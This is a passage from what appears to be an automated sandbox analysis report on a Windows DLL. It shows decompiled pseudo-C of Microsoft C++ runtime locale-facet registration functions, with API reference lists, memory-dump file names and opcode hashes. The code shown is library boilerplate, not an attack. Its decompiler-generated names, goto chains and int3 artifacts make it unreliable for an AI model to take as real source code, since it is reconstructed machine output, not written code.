													_t276 =  *0x6de96dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6DDB161C(0x6de96d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6DDD66BA(_t286 - 0x14);
														return E6DDF0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6DDE1558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t286 - 0x20);
																E6DDF3D74(_t286 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t203, _t269, _t276, 0x14);
																E6DDD6653(_t286 - 0x14, 0);
																_t277 =  *0x6de96e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6DDB161C(0x6de96dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6DDD66BA(_t286 - 0x14);
																	return E6DDF0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6DDE15C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t286 - 0x20);
																			E6DDF3D74(_t286 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t203, _t270, _t277, 0x14);
																			E6DDD6653(_t286 - 0x14, 0);
																			_t278 =  *0x6de96dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6DDB161C(0x6de96d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6DDD66BA(_t286 - 0x14);
																				return E6DDF0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6DDE162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6DDB1438(_t245);
																						E6DDF3D74(_t286 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de3851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6de3c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6DDE542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6DDF0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6DDD6FD3(__eflags, _t271);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6de96dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6DDD6FD3(__eflags, _t270);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6de96e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6DDD6FD3(__eflags, _t269);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6de96dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6DDD6FD3(__eflags, _t268);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6de96dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6DDD6FD3(__eflags, _t267);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6de96de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6DDD6FD3(__eflags, _t266);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6de96ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF952
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF95C
int.LIBCPMT ref: 6DDDF973

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF9EB

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4d7e49b2ec3a08e265c53fff8721504f1d049d8e83f0d2349f2243ff37b8776f
Instruction ID: fe127b5d29b24984ca32e0db06c4e73b001b37d174a637273c0f848458037c65
Opcode Fuzzy Hash: 4d7e49b2ec3a08e265c53fff8721504f1d049d8e83f0d2349f2243ff37b8776f
Instruction Fuzzy Hash: 0C11C275D08269DBCF01FB64C850AFDB775AF54318F26400AF615AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t242 - 0x14, 0);
				_t231 =  *0x6de96e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6DDB161C(0x6de96e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6DDD66BA(_t242 - 0x14);
					return E6DDF0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6DDEC0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t242 - 0x20);
							E6DDF3D74(_t242 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t225, _t231, 0x14);
							E6DDD6653(_t242 - 0x14, 0);
							_t232 =  *0x6de96e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6DDB161C(0x6de96e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6DDD66BA(_t242 - 0x14);
								return E6DDF0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6DDEC120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t242 - 0x20);
										E6DDF3D74(_t242 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t172, _t226, _t232, 0x14);
										E6DDD6653(_t242 - 0x14, 0);
										_t233 =  *0x6de96e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6DDB161C(0x6de96e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6DDD66BA(_t242 - 0x14);
											return E6DDF0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6DDEC1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t242 - 0x20);
													E6DDF3D74(_t242 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t172, _t227, _t233, 0x14);
													E6DDD6653(_t242 - 0x14, 0);
													_t234 =  *0x6de96e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6DDB161C(0x6de96e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6DDD66BA(_t242 - 0x14);
														return E6DDF0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6DDEC229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t242 - 0x20);
																E6DDF3D74(_t242 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t172, _t228, _t234, 0x14);
																E6DDD6653(_t242 - 0x14, 0);
																_t235 =  *0x6de96e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6DDB161C(0x6de96e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6DDB171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6DDD66BA(_t242 - 0x14);
																	return E6DDF0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6DDEC295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6DDB1438(_t207);
																			E6DDF3D74(_t242 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de3851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6de3c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6DDED028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6DDF0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6DDD6FD3(__eflags, _t229);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6de96e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6DDD6FD3(__eflags, _t228);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6de96e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6DDD6FD3(__eflags, _t227);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6de96e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6DDD6FD3(__eflags, _t226);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6de96e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6DDD6FD3(__eflags, _t225);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6de96e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB945
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB94F
int.LIBCPMT ref: 6DDEB966

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB9DE

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b3f0fec39a1c1d101e6d088bdfe7ab99bcea91bfd743ee11cb03451a37daa347
Instruction ID: db4d7238e819ca79a88e19719a686464c8a51c9d0a5031ed69b9c4a305430bbd
Opcode Fuzzy Hash: b3f0fec39a1c1d101e6d088bdfe7ab99bcea91bfd743ee11cb03451a37daa347
Instruction Fuzzy Hash: E311A075809619DBCF01FB64C850AFDB7B4AF45318F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB898, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDEB898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t286 - 0x14, 0);
				_t273 =  *0x6de96e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6DDB161C(0x6de96e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6DDD66BA(_t286 - 0x14);
					return E6DDF0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6DDEC050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t286 - 0x20);
							E6DDF3D74(_t286 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t266, _t273, 0x14);
							E6DDD6653(_t286 - 0x14, 0);
							_t274 =  *0x6de96e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6DDB161C(0x6de96e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6DDD66BA(_t286 - 0x14);
								return E6DDF0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6DDEC0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t286 - 0x20);
										E6DDF3D74(_t286 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t203, _t267, _t274, 0x14);
										E6DDD6653(_t286 - 0x14, 0);
										_t275 =  *0x6de96e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6DDB161C(0x6de96e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6DDD66BA(_t286 - 0x14);
											return E6DDF0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6DDEC120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t286 - 0x20);
													E6DDF3D74(_t286 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t203, _t268, _t275, 0x14);
													E6DDD6653(_t286 - 0x14, 0);
													_t276 =  *0x6de96e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6DDB161C(0x6de96e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6DDD66BA(_t286 - 0x14);
														return E6DDF0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6DDEC1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t286 - 0x20);
																E6DDF3D74(_t286 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t203, _t269, _t276, 0x14);
																E6DDD6653(_t286 - 0x14, 0);
																_t277 =  *0x6de96e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6DDB161C(0x6de96e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6DDD66BA(_t286 - 0x14);
																	return E6DDF0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6DDEC229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t286 - 0x20);
																			E6DDF3D74(_t286 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t203, _t270, _t277, 0x14);
																			E6DDD6653(_t286 - 0x14, 0);
																			_t278 =  *0x6de96e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6DDB161C(0x6de96e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6DDD66BA(_t286 - 0x14);
																				return E6DDF0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6DDEC295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6DDB1438(_t245);
																						E6DDF3D74(_t286 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de3851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6de3c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6DDED028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6DDF0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6DDD6FD3(__eflags, _t271);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6de96e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6DDD6FD3(__eflags, _t270);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6de96e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6DDD6FD3(__eflags, _t269);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6de96e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6DDD6FD3(__eflags, _t268);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6de96e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6DDD6FD3(__eflags, _t267);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6de96e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6DDD6FD3(__eflags, _t266);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6de96e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB8A9
int.LIBCPMT ref: 6DDEB8C0

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB938

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4e880843ce70f24214e326e0760043496345caf217fe6c184581e64824138f7a
Instruction ID: d1d9904130f745f9a6d38253d43ed02f12eb5ca1398261963f13a339af96ea1f
Opcode Fuzzy Hash: 4e880843ce70f24214e326e0760043496345caf217fe6c184581e64824138f7a
Instruction Fuzzy Hash: 2611A075808219DBCF01FB64C840ABDB775AF44358F270509F611AB290DF74AE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DDDFBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t110 - 0x14, 0);
				_t105 =  *0x6de96e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6DDB161C(0x6de96dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6DDD66BA(_t110 - 0x14);
					return E6DDF0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6DDE15C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t110 - 0x20);
							E6DDF3D74(_t110 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t102, _t105, 0x14);
							E6DDD6653(_t110 - 0x14, 0);
							_t106 =  *0x6de96dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6DDB161C(0x6de96d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
